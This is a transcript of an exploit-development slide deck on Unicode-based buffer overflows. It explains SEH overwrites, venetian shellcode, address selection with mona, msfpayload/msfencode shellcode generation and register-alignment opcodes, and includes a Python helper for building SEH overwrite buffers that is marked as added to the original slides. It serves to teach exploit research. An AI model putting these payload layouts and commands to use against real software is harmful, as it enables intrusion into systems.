exploit research and development megaprimer: unicode based exploit development


Upload: ajin-abraham

Posted on 08-May-2015


Category: Education



DESCRIPTION

Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf

TRANSCRIPT

Page 1: Exploit Research and Development Megaprimer: Unicode Based Exploit Development

Exploit Research: Unicode Based Exploit Development

Ajin Abraham
@ajinabraham, Kerala Cyber Force
www.keralacyberforce.in

Page 2: Things to Keep in Mind

Page 3: Things to Keep in Mind

• For bytes above 0x7F the Unicode translation is different: the ANSI-to-Unicode conversion (MultiByteToWideChar) widens every byte 0x01–0x7F to 0x00XX, while bytes 0x80 and above go through the active ANSI code page and in general do not come out as 0x00XX (in Windows-1252, for example, 0x80 becomes U+20AC).

• So take care when choosing addresses: no byte of the address should be above 0x7F, since the translation differs there. Whether a particular byte above 0x7F survives depends on the target's code page; staying at or below 0x7F is the safe choice unless you have verified it.

• In Unicode-based exploits the shellcode is in a crafted Unicode-compatible form, prepended with a decoder that rebuilds the original shellcode in memory and then executes it.

Page 4: Exploitation Techniques

• EIP overwrite
• SEH overwrite

Page 5: EIP Overwrite (in theory)

When you crash a Unicode-based application by overwriting EIP, the debugger shows EIP overwritten with 0x00410041 instead of the usual 0x41414141: every "A" (0x41) has been widened to 0x0041.

In a typical EIP overwrite we fill the buffer at ESP with our shellcode and overwrite EIP with the address of a JMP ESP, CALL ESP or PUSH ESP / RET instruction.

Here, if we can get our Unicode shellcode into, say, EAX (in most Unicode-based buffer overflows you end up controlling EAX as well as EIP), we can instead overwrite EIP with the address of a JMP EAX. Because the input is widened, an address such as 0x006D0015 is written as its two non-zero bytes only, and the script looks like this:

junk      = "A" * 1000    # the offset to EIP
eip       = "\x15\x6D"    # little endian; the 00 bytes are inserted by the conversion at run time
align     = "XXXXXX"      # point a register at the decoder + shellcode and jump to it
shellcode = "XXXXXXX"     # Unicode-compatible shellcode (usually decoder + shellcode)
payload   = junk + eip + align + shellcode + junk

Page 6

We will go with the Unicode-based SEH overwrite, since most Unicode-based exploits are SEH overwrites.

Page 7: Normal SEH Overwrite Buffer Overflow

nSEH: a short jump to the shellcode (\xeb\x06\x90\x90)
SEH: the address of a POP, POP, RET sequence
Shellcode

Flow after the exception: 1. the handler address (POP, POP, RET) is called; 2. RET lands in nSEH; 3. the short jump reaches the shellcode.

Page 8: Unicode-Based SEH Overwrite Buffer Overflow

The idea is the same, but the way to get there is a bit different.

nSEH: jump to the shellcode. We cannot use an actual JMP (its opcode bytes would be widened), so we walk to the shellcode using single-byte instructions together with NOP-like, harmless aligning instructions (venetian shellcode).
SEH: the address of a POP, POP, RET sequence; the address has to be of the form 0x00aa00bb.
Shellcode: Unicode shellcode, i.e. decoder + shellcode. We have to point a register at the decoder and jump to it; the venetian shellcode technique is used for the alignment.

The flow is the same three steps as on page 7: the handler is called, RET lands in nSEH, and from there we walk into the shellcode.

Page 9: Pointer to Next SEH (nSEH)

• We need to walk to our shellcode. We can use a one-byte instruction plus a NOP-like aligning instruction, the venetian shellcode technique.

Venetian shellcode

• Venetian shellcode is nothing more than inserting NOP-like instructions that 1. absorb the null bytes the widening inserts, 2. do not harm the registers or the surrounding instructions, and 3. fill the gaps.

• We cannot use an actual JMP in nSEH; we walk to the shellcode with single-byte instructions and harmless NOP-like aligning instructions.

• You need to try the candidates out and choose the one that works (POPAD or INC ECX as the one-byte instruction, and which NOP-like padding to use), and you can only check it after you have settled the SEH address, since after nSEH execution runs on into the handler address bytes and the rest of the buffer.

Examples:
"\x61\x41" widens to 61 00 41 00: 61 = POPAD, then 00 41 00 = ADD BYTE PTR DS:[ECX],AL
"\x41\x71" widens to 41 00 71 00: 41 = INC ECX, then 00 71 00 = ADD BYTE PTR DS:[ECX],DH

One-byte instructions: 41 = INC ECX, 61 = POPAD

Page 10: SE Handler (SEH)

SEH: POP, POP, RET sequence; the address has to be of the form 0x00aa00bb.

Selecting a suitable address:
• Every non-zero byte of the address must be in the range 0x01–0x7F.
• Choose the address from a module compiled without SafeSEH.
• The address has to be of the form 0x00aa00bb.
• If you choose 0x004d0041, specify "\x41\x4d" (little endian) in the exploit; the 00 bytes are prepended by the program during execution.
• Even among suitable addresses, not all of them work. You have to try each one to find an address that does not disturb the execution flow and reaches our shellcode (the handler's own bytes are executed on the way from nSEH into the buffer).

!mona seh -cp unicode

Suitable addresses reported:
0x004b00cb
0x004a0041
0x004a0059
0x004d0041
0x004100f2
0x004c0020
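The rules on pages 3 and 10 (stay at or below 0x7F, use the 0x00aa00bb form) can be checked mechanically. The following is an added example and not part of the original slides: it models the target's ANSI-to-UTF-16 widening with Python's cp1252 codec (an assumption: the target's ANSI code page is Windows-1252, the default on Western Windows installs), encodes an address the way page 10 describes, filters the mona candidates listed above with both the 0x7F rule of thumb and a round-trip check, and reads the SE handler pointer back out of a widened test buffer. The round-trip check also explains why mona lists 0x004b00cb and 0x004100f2 as suitable: in Windows-1252 the bytes 0xA0–0xFF map to U+00A0–U+00FF and survive widening, while 0x80–0x9F (0x80 becomes U+20AC) do not. The 1000-byte offset and the test buffer are constructed sample values.

```python
"""Added example: unicode-compatible address checks for a Unicode SEH overwrite.
Assumption: the target widens input with the Windows-1252 ANSI code page
(Python codec "cp1252"). Change ANSI_CODEPAGE if the target uses another one.
"""
import struct

ANSI_CODEPAGE = "cp1252"   # assumption, see module docstring


def ansi_to_unicode(payload: bytes) -> bytes:
    """Model of MultiByteToWideChar on our buffer: every byte becomes one
    UTF-16LE code unit. 0x01..0x7f become XX 00; the rest depends on the code
    page (undefined bytes such as 0x81 are replaced and never survive)."""
    return payload.decode(ANSI_CODEPAGE, errors="replace").encode("utf-16-le")


def has_unicode_shape(addr: int) -> bool:
    """0x00aa00bb with aa and bb non-zero (a 0x00 byte would end the input)."""
    return (addr & 0xff00ff00) == 0 and (addr & 0xff) != 0 and (addr >> 16) != 0


def within_7f_rule(addr: int) -> bool:
    """The slides' rule of thumb: both payload bytes at or below 0x7f."""
    return has_unicode_shape(addr) and (addr & 0xff) <= 0x7f and (addr >> 16) <= 0x7f


def survives_expansion(addr: int) -> bool:
    """The practical criterion: the two payload bytes must widen to exactly the
    four little-endian bytes of addr under the target's code page."""
    if not has_unicode_shape(addr):
        return False
    return ansi_to_unicode(bytes([addr & 0xff, addr >> 16])) == struct.pack("<I", addr)


def encode_unicode_address(addr: int) -> bytes:
    """Bytes to place in the payload for addr (page 10: 0x004d0041 -> "\\x41\\x4d");
    the 00 bytes are left out because the widening re-inserts them."""
    if not survives_expansion(addr):
        raise ValueError(f"{addr:#010x} does not survive widening")
    return bytes([addr & 0xff, addr >> 16])


def build_seh_record(offset: int, seh_addr: int, nseh: bytes = b"\x61\x41") -> bytes:
    """Junk up to the SEH record, then nSEH (page 9's POPAD walk) and the handler."""
    return b"A" * offset + nseh + encode_unicode_address(seh_addr)


def seh_dword_after_expansion(payload: bytes, offset: int) -> int:
    """Read the SE handler pointer as the program sees it after widening: every
    payload byte is doubled, so nSEH sits at 2*offset and SEH four bytes later."""
    widened = ansi_to_unicode(payload)
    return struct.unpack_from("<I", widened, 2 * offset + 4)[0]


# Candidate list from the slide's "!mona seh -cp unicode" output.
MONA_CANDIDATES = [0x004b00cb, 0x004a0041, 0x004a0059, 0x004d0041, 0x004100f2, 0x004c0020]


def classify(addrs):
    """Split candidates by the rule of thumb and by the round-trip check."""
    return {
        "below_7f": [a for a in addrs if within_7f_rule(a)],
        "survive_cp1252": [a for a in addrs if survives_expansion(a)],
    }


if __name__ == "__main__":
    for name, addrs in classify(MONA_CANDIDATES).items():
        print(name, [f"{a:#010x}" for a in addrs])
    print("0x80 widens to", ansi_to_unicode(b"\x80").hex())   # ac20, not 8000
    record = build_seh_record(1000, 0x004d0041)              # constructed offset
    print(f"SEH after widening: {seh_dword_after_expansion(record, 1000):#010x}")
```

When the target uses a different ANSI code page (for example a Japanese install, where 0x81–0x9F and 0xE0–0xFC are lead bytes of a double-byte character), change ANSI_CODEPAGE and re-run the round-trip check rather than trusting the 0x7F rule in either direction.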

Page 11: Shellcode

• Generate the shellcode with Metasploit alone, or use SkyLined's alpha2 encoder:

msfpayload windows/exec CMD=calc R | msfencode -e x86/unicode_upper BufferRegister=EAX -t raw
msfpayload windows/exec CMD=calc R | ./alpha2 eax --unicode --uppercase

• We need to point a register at our shellcode and jump to it. For the alignment we use the venetian shellcode technique.

• We will use EAX to hold the shellcode address (hence BufferRegister=EAX / eax above).

Shellcode: Unicode shellcode, i.e. decoder + shellcode. We point a register at the decoder and jump to it. Layout in the buffer: [decoder][shellcode].

Page 12: Aligning the Shellcode

• See the following set of instructions:

"\x58"          pop eax              # pop the saved EBP value from the stack into EAX
"\x05\xbb\xaa"  add eax, 0xAA00BB00  # \  add and subtract: with 0xAA00BB00 > 0xCC00DD00 the difference
"\x2d\xdd\xcc"  sub eax, 0xCC00DD00  # /  is a positive value X, which is what effectively gets added to EAX
"\x50"          push eax             # push the new value of EAX (the shellcode address) onto the stack
"\xc3"          ret                  # return into the pushed address: EIP = address of the shellcode

Page 13: Aligning the Shellcode

• You will need to align this set of instructions properly with venetian shellcode so that it does not break at execution time.

• Be creative, and analyse the execution flow in the debugger. At times we need to add extra venetian shellcode at the beginning and at the end to align everything properly.

• So, for example, the previous code may look like this after adding some venetian shellcode:

"\x58"          pop eax              # pop the saved EBP value from the stack into EAX
"\x71"                               # venetian padding: with the inserted 00 it becomes ADD BYTE PTR [ECX],DH
"\x05\xbb\xaa"  add eax, 0xAA00BB00  # \  add and subtract: the difference X (positive if 0xAA00BB00 > 0xCC00DD00)
"\x71"                               # venetian padding
"\x2d\xdd\xcc"  sub eax, 0xCC00DD00  # /  is what effectively gets added to EAX
"\x71"                               # venetian padding
"\x50"          push eax             # push the new value of EAX onto the stack
"\x71"                               # venetian padding
"\xC3"          ret                  # return into the pushed address: EIP = address of the shellcode

• Add enough NOP-like instructions to reach our shellcode.

• An MSF pattern can be used, but it is better to just try it out manually.

Page 14: Some Final Words

• Try out some of the Unicode-based SEH overwrite exploits available on Exploit-DB.

• The reliability of these exploits suffers because of the Unicode conversion.

• Keep tweaking the code; you can achieve this in other ways too.

• Read these articles:
• https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc
• http://www.fuzzysecurity.com/tutorials/expDev/5.html
• http://net-ninja.net/article/2010/May/29/unicode-the-magic-of-exploiting-0x00410041/